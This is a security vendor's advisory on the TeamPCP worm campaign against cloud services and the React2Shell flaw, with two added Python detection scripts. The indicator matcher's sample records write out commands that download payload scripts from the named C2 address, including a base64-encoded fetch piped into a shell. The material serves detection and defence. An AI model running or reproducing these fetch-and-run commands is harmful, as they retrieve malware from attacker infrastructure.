TeamPCP Worm Targets Docker, Kubernetes, Ray, and Redis via React2Shell CVE-2025-55182 to Build Criminal Cloud Infrastructure
- Rescana

Executive Summary
The emergence of the TeamPCP worm marks a significant escalation in the threat landscape targeting cloud-native infrastructure. Since late 2025, this highly automated, worm-driven campaign has systematically exploited misconfigured and vulnerable cloud services, including Docker, Kubernetes, Ray, and Redis, as well as critical vulnerabilities in React and Next.js applications, most notably the React2Shell vulnerability (CVE-2025-55182, CVSS 10.0). The operation, attributed to the threat cluster known as TeamPCP (also tracked as DeadCatx3, PCPcat, PersyPCP, and ShellForce), leverages a combination of opportunistic scanning, rapid exploitation, and multi-stage payload delivery to establish a distributed criminal infrastructure. The campaign’s objectives include cryptocurrency mining, data exfiltration, extortion, and the creation of proxy networks for further malicious activity. Organizations with cloud-native deployments are at heightened risk and must take immediate action to audit, patch, and monitor their environments.
Threat Actor Profile
TeamPCP is a sophisticated threat actor group with a history of targeting cloud infrastructure at scale. The group is known for its automation capabilities, rapid weaponization of public exploits, and use of multi-functional malware. TeamPCP operates several aliases, including DeadCatx3, PCPcat, PersyPCP, and ShellForce, and maintains a presence on Telegram, where it publishes stolen data and coordinates criminal activities. The group’s infrastructure is distributed, leveraging compromised hosts as command-and-control (C2) relays, proxies, and scanning nodes. TeamPCP is notable for its use of open-source tools, custom Python scripts, and the Sliver C2 framework, as well as for its ability to monetize access through ransomware, cryptojacking, and data extortion.
Technical Analysis of Malware/TTPs
The TeamPCP campaign employs a modular, worm-like malware architecture designed for rapid propagation and persistence across heterogeneous cloud environments. Initial access is achieved through exploitation of exposed or misconfigured APIs in Docker, Kubernetes, Ray, and Redis, as well as through remote code execution (RCE) vulnerabilities in React and Next.js applications, particularly CVE-2025-55182 and CVE-2025-29927. Automated scanners such as scanner.py and pcpcat.py enumerate public IP ranges, often sourced from the DeadCatx3 GitHub repository, to identify vulnerable targets.
Upon successful exploitation, the worm delivers a base64-encoded payload that downloads and executes additional scripts, including proxy.sh, kube.py, react.py, and mine.sh. These scripts perform environment fingerprinting, credential harvesting, lateral movement, and deployment of proxy and tunneling utilities. In Kubernetes environments, kube.py is used to harvest credentials, enumerate pods and namespaces, and deploy privileged containers for persistence. The malware also establishes outbound connections to C2 infrastructure, such as the node at 67.217.57[.]240, and may deploy cryptocurrency miners or ransomware payloads depending on the environment.
The campaign leverages the Sliver C2 framework for command-and-control, and uses compromised hosts as part of a distributed proxy and scanning network. Data exfiltration is automated, with stolen data published on the ShellForce Telegram channel. The malware is highly evasive, using legitimate cloud APIs and living-off-the-land techniques to blend in with normal operations.
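As an added illustration of the detection side of the behaviour described above (example code written for this page, not Rescana's tooling and not any of the worm's scripts): a small Python matcher that scans process-execution records for the script file names and the C2 address named in this report and, because the first stage arrives base64-encoded, also decodes base64-looking blobs and checks their contents. The record format and the four sample lines are constructed; the only indicators used are the ones this report names.

```python
"""Indicator matcher for the TeamPCP artifacts named in the report.

Added example, not Rescana's or the threat actor's code. The record format
and sample lines are constructed; the indicators come from the report.
"""
import base64
import binascii
import re

# Indicators taken from the report (the C2 address is given defanged there).
PAYLOAD_NAMES = ("proxy.sh", "scanner.py", "kube.py", "react.py", "pcpcat.py", "mine.sh")
C2_ADDRESSES = ("67.217.57.240",)

# A run of 16+ base64-alphabet characters with optional padding is treated
# as a candidate blob; anything that does not decode cleanly is ignored.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _indicators_in(text):
    """Return the indicator tags present as plain substrings of `text`."""
    hits = set()
    lowered = text.lower()
    for name in PAYLOAD_NAMES:
        if name in lowered:
            hits.add("payload:" + name)
    for addr in C2_ADDRESSES:
        if addr in text:
            hits.add("c2:" + addr)
    return hits


def _decoded_blobs(text):
    """Yield the UTF-8 text of every base64-looking token that decodes cleanly."""
    for match in _B64_TOKEN.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        yield raw.decode("utf-8", errors="ignore")


def scan_record(record):
    """Tags for one record: direct matches plus 'b64-' matches from decoded blobs."""
    hits = _indicators_in(record)
    for decoded in _decoded_blobs(record):
        hits.update("b64-" + tag for tag in _indicators_in(decoded))
    return hits


def scan_records(records):
    """Return (record, sorted tags) for every record that carries an indicator."""
    findings = []
    for rec in records:
        tags = scan_record(rec)
        if tags:
            findings.append((rec, sorted(tags)))
    return findings


# Constructed first-stage blob: the report describes the initial payload as
# base64 that fetches the follow-on scripts, so one sample line carries one.
_STAGE_ONE = base64.b64encode(
    b"wget -q http://67.217.57.240/mine.sh -O /tmp/mine.sh"
).decode("ascii")

# Constructed process-execution records, loosely modelled on audit output.
SAMPLE_RECORDS = [
    "uid=1000 exe=/usr/bin/kubectl cmd=kubectl get pods -n production",
    "uid=0 exe=/usr/bin/curl cmd=curl -s http://67.217.57.240/kube.py -o /tmp/kube.py",
    "uid=0 exe=/bin/sh cmd=sh -c 'echo " + _STAGE_ONE + " | base64 -d | sh'",
    "uid=0 exe=/usr/bin/python3 cmd=python3 /opt/app/server.py",
]

if __name__ == "__main__":
    for rec, tags in scan_records(SAMPLE_RECORDS):
        print(tags, "<-", rec)
```

Run against real audit or EDR command-line records, the second and third sample lines are the shapes to expect: a direct fetch that names both the script and the C2 host, and a first stage whose only visible indicator is inside the base64 argument. Substring matching on short file names like kube.py will occasionally fire on unrelated paths, so treat hits as triage input rather than a verdict.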
Exploitation in the Wild
Active exploitation of the TeamPCP worm has been observed since December 2025, with initial reconnaissance and tool development traced back to July 2025 via Telegram activity. The campaign is opportunistic, targeting any organization with exposed or misconfigured cloud services, regardless of industry or geography. Victims have been identified in Canada, Serbia, South Korea, the UAE, and the United States, with collateral impact across multiple sectors. The worm’s propagation is automated and environment-aware, enabling it to rapidly compromise large numbers of hosts and establish persistent footholds. Stolen data is routinely published on Telegram, and compromised infrastructure is repurposed for further attacks, including scanning, proxying, and monetization through cryptojacking and extortion.
Victimology and Targeting
The TeamPCP campaign is characterized by its broad, opportunistic targeting of cloud-native environments. Affected organizations include those running Amazon Web Services (AWS), Microsoft Azure, and other public cloud platforms, as well as private cloud deployments. The primary risk factor is the exposure of management APIs or dashboards for Docker, Kubernetes, Ray, and Redis to the public internet, often due to misconfiguration or lack of access controls. Additionally, organizations running vulnerable versions of React and Next.js are at risk of RCE via the React2Shell vulnerability (CVE-2025-55182) and related flaws. The campaign does not appear to be industry-specific, with victims spanning technology, finance, healthcare, and government sectors. The use of automated scanning and exploitation tools enables TeamPCP to rapidly identify and compromise new targets as they become exposed.
Mitigation and Countermeasures
To defend against the TeamPCP worm and similar threats, organizations should immediately audit their cloud environments for exposed or misconfigured APIs and dashboards. Access to Docker, Kubernetes, Ray, and Redis management interfaces should be restricted to trusted networks and protected with strong authentication. All instances of React and Next.js should be updated to address CVE-2025-55182, CVE-2025-29927, and any other known vulnerabilities. Security teams should monitor for the presence of known malware payloads (proxy.sh, scanner.py, kube.py, react.py, pcpcat.py, mine.sh) and for outbound connections to known C2 infrastructure, particularly 67.217.57[.]240. Kubernetes clusters should be inspected for unauthorized privileged pods, and cloud hosts should be checked for unauthorized proxy, tunneling, or mining processes. Network segmentation, least-privilege access, and continuous monitoring are essential to limit the blast radius of any compromise. Incident response plans should be updated to include detection and remediation of cloud-native threats, and organizations are encouraged to leverage threat intelligence feeds and automated security tooling to stay ahead of emerging campaigns.
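One concrete form of the Kubernetes inspection above, as an added example that is not Rescana's code: a Python audit over the JSON that `kubectl get pods -A -o json` produces, flagging pods that run privileged containers. It goes beyond the privileged flag this report names and also flags hostPID, hostNetwork, hostIPC and hostPath mounts of the node root or a container runtime socket, and it takes an allowlist of (namespace, name) pairs for workloads that legitimately need such settings. The pod list, image names and namespaces below are constructed placeholders.

```python
"""Audit a Kubernetes pod list for privileged or host-sharing pods.

Added example, not Rescana's code. Input is the JSON shape produced by
`kubectl get pods -A -o json`; the pod list below is constructed.
"""
import json
import sys

# hostPath targets that hand a container the node's filesystem or runtime.
SENSITIVE_HOST_PATHS = ("/", "/var/run/docker.sock", "/run/containerd/containerd.sock")


def pod_risk_reasons(pod):
    """Return the list of reasons a pod should be reviewed (empty if none)."""
    spec = pod.get("spec", {})
    reasons = []
    for field in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(field):
            reasons.append(field)
    for ctr in spec.get("containers", []) + spec.get("initContainers", []):
        if (ctr.get("securityContext") or {}).get("privileged"):
            reasons.append("privileged container:" + ctr.get("name", "?"))
    for vol in spec.get("volumes", []):
        host_path = (vol.get("hostPath") or {}).get("path")
        if host_path in SENSITIVE_HOST_PATHS:
            reasons.append("hostPath:" + host_path)
    return reasons


def audit_pod_list(pod_list_json, approved=frozenset()):
    """Findings for every risky pod, skipping (namespace, name) pairs in `approved`."""
    findings = []
    for pod in json.loads(pod_list_json).get("items", []):
        meta = pod.get("metadata", {})
        key = (meta.get("namespace"), meta.get("name"))
        if key in approved:
            continue
        reasons = pod_risk_reasons(pod)
        if reasons:
            findings.append({"namespace": key[0], "name": key[1], "reasons": reasons})
    return findings


# Constructed pod list in the shape of `kubectl get pods -A -o json` output.
SAMPLE_POD_LIST_JSON = json.dumps({
    "kind": "PodList",
    "items": [
        {"metadata": {"name": "web-7d9f", "namespace": "production"},
         "spec": {"containers": [{"name": "web", "image": "registry.example/web:1.4",
                                  "securityContext": {"runAsNonRoot": True}}]}},
        {"metadata": {"name": "node-exporter-x1", "namespace": "monitoring"},
         "spec": {"hostNetwork": True, "hostPID": True,
                  "containers": [{"name": "exporter",
                                  "image": "registry.example/node-exporter:1.8"}]}},
        {"metadata": {"name": "debug-a1b2", "namespace": "default"},
         "spec": {"hostPID": True,
                  "containers": [{"name": "shell", "image": "docker.io/library/alpine:3.20",
                                  "securityContext": {"privileged": True}}],
                  "volumes": [{"name": "root", "hostPath": {"path": "/"}}]}},
    ],
})

if __name__ == "__main__":
    # Read a real pod list from stdin when piped in; otherwise use the sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_POD_LIST_JSON
    known_good = {("monitoring", "node-exporter-x1")}
    for finding in audit_pod_list(data, approved=known_good):
        print(finding["namespace"] + "/" + finding["name"], finding["reasons"])
```

The allowlist is what keeps this usable: monitoring agents and CNI pods routinely need host namespaces, so the review target is pods with these settings that nobody has approved, which is the pattern the report attributes to kube.py.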
References
The following sources provide additional technical details and context on the TeamPCP campaign and associated vulnerabilities:
- The Hacker News: TeamPCP Worm Exploits Cloud Infrastructure
- Flare: TeamPCP Cloud-Native Ransomware
- eSecurity Planet: TeamPCP and the Rise of Cloud-Native Cybercrime
- Reddit: TeamPCP worm exploits cloud infrastructure
- NVD: CVE-2025-55182
- GitHub: DeadCatx3
About Rescana
Rescana is a leader in third-party risk management (TPRM) for modern enterprises. Our platform empowers organizations to continuously monitor, assess, and mitigate cyber risks across their digital supply chain and cloud environments. By leveraging advanced threat intelligence and automation, Rescana helps customers stay ahead of emerging threats and maintain robust security postures. For questions or further information, we are happy to assist at ops@rescana.com.